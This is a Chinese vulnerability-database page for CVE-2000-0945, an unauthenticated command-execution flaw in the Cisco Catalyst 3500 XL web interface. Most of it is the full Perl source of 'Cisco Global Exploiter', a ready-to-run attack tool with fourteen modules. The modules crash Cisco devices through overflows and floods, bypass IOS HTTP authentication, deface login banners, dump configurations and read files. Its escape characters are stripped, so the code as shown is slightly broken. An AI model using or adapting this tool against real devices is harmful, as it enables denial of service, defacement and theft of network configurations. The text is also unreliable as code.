Catalyst web配置界面任意无认证命令执行漏洞
漏洞ID | 1106057 | 漏洞类型 | 未知 |
发布时间 | 2000-10-26 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-2000-0945 |
CNNVD-ID | CNNVD-200012-161 |
漏洞平台 | Hardware | CVSS评分 | 10.0 |
|漏洞来源
|漏洞详情
Catalyst3500XL交换机web配置界面存在漏洞。当没有设置启用密码时,远程攻击者借助包含/exec/目录的URL执行任意无认证命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/1846/info
A vulnerability exists in the webserver configuration interface which will allow an anonymous user to execute commands. A http request which includes /exec and a known filename will reveal the contents of the particular file. In addition to disclosing the contents of files, this vulnerability could allow a user to execute arbitrary code.
#!/usr/bin/perl
##
# Cisco Global Exploiter
#
# Legal notes :
# The BlackAngels staff refuse all responsabilities
# for an incorrect or illegal use of this software
# or for eventual damages to others systems.
#
# http://www.blackangels.it
##
##
# Modules
##
use Socket;
use IO::Socket;
##
# Main
##
$host = "";
$expvuln = "";
$host = @ARGV[ 0 ];
$expvuln = @ARGV[ 1 ];
if ($host eq "") {
usage();
}
if ($expvuln eq "") {
usage();
}
if ($expvuln eq "1") {
cisco1();
}
elsif ($expvuln eq "2") {
cisco2();
}
elsif ($expvuln eq "3") {
cisco3();
}
elsif ($expvuln eq "4") {
cisco4();
}
elsif ($expvuln eq "5") {
cisco5();
}
elsif ($expvuln eq "6") {
cisco6();
}
elsif ($expvuln eq "7") {
cisco7();
}
elsif ($expvuln eq "8") {
cisco8();
}
elsif ($expvuln eq "9") {
cisco9();
}
elsif ($expvuln eq "10") {
cisco10();
}
elsif ($expvuln eq "11") {
cisco11();
}
elsif ($expvuln eq "12") {
cisco12();
}
elsif ($expvuln eq "13") {
cisco13();
}
elsif ($expvuln eq "14") {
cisco14();
}
else {
printf "nInvalid vulnerability number ...nn";
exit(1);
}
##
# Functions
##
sub usage
{
printf "nUsage :n";
printf "perl cge.pl <target> <vulnerability number>nn";
printf "Vulnerabilities list :n";
printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerabilityn";
printf "[2] - Cisco IOS Router Denial of Service Vulnerabilityn";
printf "[3] - Cisco IOS HTTP Auth Vulnerabilityn";
printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerabilityn";
printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerabilityn";
printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerabilityn";
printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerabilityn";
printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerabilityn";
printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerabilityn";
printf "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerabilityn";
printf "[11] - Cisco Catalyst Memory Leak Vulnerabilityn";
printf "[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerabilityn";
printf "[13] - %u Encoding IDS Bypass Vulnerability (UTF)n";
printf "[14] - Cisco IOS HTTP Denial of Service Vulnerabilityn";
exit(1);
}
sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability
{
my $serv = $host;
my $dch = "?????????????????a~ %%%%%XX%%%%%";
my $num = 30000;
my $string .= $dch x $num;
my $shc=" 15 12";
my $sockd = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $serv,
PeerPort => "(23)",
) || die("No telnet server detected on $serv ...nn");
$sockd->autoflush(1);
print $sockd "$string". $shc;
while (<$sockd>){ print }
print("nPacket sent ...n");
sleep(1);
print("Now checking server's status ...n");
sleep(2);
my $sockd2 = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $serv,
PeerPort => "(23)",
) || die("Vulnerability successful exploited. Target server is down ...nn");
print("Vulnerability unsuccessful exploited. Target server is still up ...nn");
close($sockd2);
exit(1);
}
sub cisco2 # Cisco IOS Router Denial of Service Vulnerability
{
my $serv = $host;
my $sockd = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd){die "No http server detected on $serv ...nn"};
$sockd->autoflush(1);
print $sockd "GET /%% HTTP/1.0nn";
-close $sockd;
print "Packet sent ...n";
sleep(1);
print("Now checking server's status ...n");
sleep(2);
my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...nn"};
print("Vulnerability unsuccessful exploited. Target server is still up ...nn");
close($sockd2);
exit(1);
}
sub cisco3 # Cisco IOS HTTP Auth Vulnerability
{
my $serv= $host;
my $n=16;
my $port=80;
my $target = inet_aton($serv);
my $fg = 0;
LAB: while ($n<100) {
my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0rnrn");
$n++;
foreach $line (@results){
$line=~ tr/A-Z/a-z/;
if ($line =~ /http/1.0 401 unauthorized/) {$fg=1;}
if ($line =~ /http/1.0 200 ok/) {$fg=0;}
}
if ($fg==1) {
sleep(2);
print "Vulnerability unsuccessful exploited ...nn";
}
else {
sleep(2);
print "nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...nn";
last LAB;
}
sub exploit {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Unable to initialize socket ...nn");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S);
$|=1;
print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
}
else { die("No http server detected on $serv ...nn"); }
}
}
exit(1);
}
sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
{
my $serv = $host;
my $n = 16;
while ($n <100) {
exploit1("GET /level/$n/exec/- HTTP/1.0nn");
$wr =~ s/n//g;
if ($wr =~ /200 ok/) {
while(1)
{ print "nVulnerability could be successful exploited. Please choose a type of attack :n";
print "[1] Banner changen";
print "[2] List vty 0 4 acl infon";
print "[3] Othern";
print "Enter a valid option [ 1 - 2 - 3 ] : ";
$vuln = <STDIN>;
chomp($vuln);
if ($vuln == 1) {
print "nEnter deface line : ";
$vuln = <STDIN>;
chomp($vuln);
exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0nn");
}
elsif ($vuln == 2) {
exploit1("GET /level/$n/exec/show%20conf HTTP/1.0nn");
print "$wrf";
}
elsif ($vuln == 3)
{ print "nEnter attack URL : ";
$vuln = <STDIN>;
chomp($vuln);
exploit1("GET /$vuln HTTP/1.0nn");
print "$wrf";
}
}
}
$wr = "";
$n++;
}
die "Vulnerability unsuccessful exploited ...nn";
sub exploit1 {
my $sockd = IO::Socket::INET -> new (
Proto => 'tcp',
PeerAddr => $serv,
PeerPort => 80,
Type => SOCK_STREAM,
Timeout => 5);
unless($sockd){die "No http server detected on $serv ...nn"}
$sockd->autoflush(1);
$sockd -> send($_[0]);
while(<$sockd>){$wr .= $_} $wrf = $wr;
close $sockd;
}
exit(1);
}
sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
{
my $serv = $host;
my $port = 22;
my $vuln = "a%a%a%a%a%a%a%";
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No ssh server detected on $serv ...nn";
print "Packet sent ...n";
print $sockd "$vuln";
close($sockd);
exit(1);
}
sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability
{
my $serv = $host;
my $port = 80;
my $vuln = "GET ? HTTP/1.0nn";
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on $serv ...nn";
print "Packet sent ...n";
print $sockd "$vuln";
sleep(2);
print "nServer response :nn";
close($sockd);
exit(1);
}
sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
{
my $serv = $host;
my $port = 80;
my $k = "";
print "Enter a file to read [ /show/config/cr set as default ] : ";
$k = <STDIN>;
chomp ($k);
if ($k eq "")
{$vuln = "GET /exec/show/config/cr HTTP/1.0nn";}
else
{$vuln = "GET /exec$k HTTP/1.0nn";}
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on $serv ...nn";
print "Packet sent ...n";
print $sockd "$vuln";
sleep(2);
print "nServer response :nn";
while (<$sockd>){print}
close($sockd);
exit(1);
}
sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability
{
my $serv = $host;
my $port = 80;
my $vuln = "GET /error?/ HTTP/1.0nn";
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on $serv ...nn";
print "Packet sent ...n";
print $sockd "$vuln";
sleep(2);
print "nServer response :nn";
while (<$sockd>){print}
close($sockd);
exit(1);
}
sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability
{
my $ip = $host;
my $port = "514";
my $ports = "";
my $size = "";
my $i = "";
my $string = "%%%%%XX%%%%%";
print "Input packets size : ";
$size = <STDIN>;
chomp($size);
socket(SS, PF_INET, SOCK_DGRAM, 17);
my $iaddr = inet_aton("$ip");
for ($i=0; $i<10000; $i++)
{ send(SS, $string, $size, sockaddr_in($port, $iaddr)); }
printf "nPackets sent ...n";
sleep(2);
printf "Please enter a server's open port : ";
$ports = <STDIN>;
chomp $ports;
printf "nNow checking server status ...n";
sleep(2);
socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...nn";
my $dest = sockaddr_in ($ports, inet_aton($ip));
connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...nn";
printf "Vulnerability unsuccessful exploited. Target server is still up ...nn";
exit(1);
}
sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
{
my $ip = $host;
my $vln = "%%%%%XX%%%%%";
my $num = 30000;
my $string .= $vln x $num;
my $shc=" 15 12";
my $sockd = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $ip,
PeerPort => "(2002)",
) || die "Unable to connect to $ip:2002 ...nn";
$sockd->autoflush(1);
print $sockd "$string" . $shc;
while (<$sockd>){ print }
print "Packet sent ...n";
close($sockd);
sleep(1);
print("Now checking server's status ...n");
sleep(2);
my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$ip,
PeerPort=>"(2002)",);
unless ($sockd){die "Vulnerability successful exploited. Target server is down ...nn"};
print("Vulnerability unsuccessful exploited. Target server is still up ...nn");
exit(1);
}
sub cisco11 # Cisco Catalyst Memory Leak Vulnerability
{
my $serv = $host;
my $rep = "";
my $str = "AAAn";
print "nInput the number of repetitions : ";
$rep = <STDIN>;
chomp $rep;
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => "(23)",
Proto => "tcp")
|| die "No telnet server detected on $serv ...nn";
for ($k=0; $k<=$rep; $k++) {
print $sockd "$str";
sleep(1);
print $sockd "$str";
sleep(1);
}
close($sockd);
print "Packet sent ...n";
sleep(1);
print("Now checking server's status ...n");
sleep(2);
my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"(23)",);
unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...nn"};
print "Vulnerability unsuccessful exploited. Target server is still up after $rep logins ...\n";
close($sockd2);
exit(1);
}
sub cisco12 # Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
{
my $serv = $host;
my $l =100;
my $vuln = "";
my $long = "A" x $l;
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => "(80)",
Proto => "tcp")
|| die "No http server detected on $serv ...nn";
for ($k=0; $k<=50; $k++) {
my $vuln = "GET " . $long . " HTTP/1.0nn";
print $sockd "$vulnnn";
sleep(1);
$l = $l + 100;
}
close($sockd);
print "Packet sent ...n";
sleep(1);
print("Now checking server's status ...n");
sleep(2);
my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...nn"};
print "Target is not vulnerable. Server is still up after 5 kb of buffer ...)n";
close($sockd2);
exit(1);
}
sub cisco13 # %u Encoding IDS Bypass Vulnerability (UTF)
{
my $serv = $host;
my $vuln = "GET %u002F HTTP/1.0nn";
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => "(80)",
Proto => "tcp")
|| die "No http server detected on $serv ...nn";
print "Packet sent ...n";
print $sockd "$vuln";
close($sockd);
sleep(1);
print("Now checking server's status ...n");
print("Please verify if directory has been listed ...nn");
print("Server response :n");
sleep(2);
while (<$sockd>){ print }
exit(1);
}
sub cisco14 # Cisco IOS HTTP server DoS Vulnerability
{
my $serv = $host;
my $vuln = "GET /TEST?/ HTTP/1.0";
my $sockd = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd){die "No http server detected on $serv ...nn"};
print $sockd "$vulnnn";
print "Packet sent ...n";
close($sockd);
sleep(1);
print("Now checking server's status ...n");
sleep(2);
my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...nn"};
print("Vulnerability unsuccessful exploited. Target server is still up ...nn");
close($sockd2);
exit(1);
}
|参考资料
来源:BID
名称:1846
链接:http://www.securityfocus.com/bid/1846
来源:XF
名称:cisco-catalyst-remote-commands(5415)
链接:http://xforce.iss.net/static/5415.php
来源:BUGTRAQ
名称:20001026Advisorydef-2000-02:CiscoCatalystremotecommandexecution
链接:http://archives.neohapsis.com/archives/bugtraq/2000-10/0380.html
来源:OSVDB
名称:444
链接:http://www.osvdb.org/444
来源:BUGTRAQ
名称:20001113Re:3500XL
链接:http://archives.neohapsis.com/archives/bugtraq/2000-11/0194.html
相关推荐: Pablo Software Solutions Baby Web Server Multiple Connection Denial Of Service Vulnerability
Pablo Software Solutions Baby Web Server Multiple Connection Denial Of Service Vulnerability 漏洞ID 1100201 漏洞类型 Failure to Handle E…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666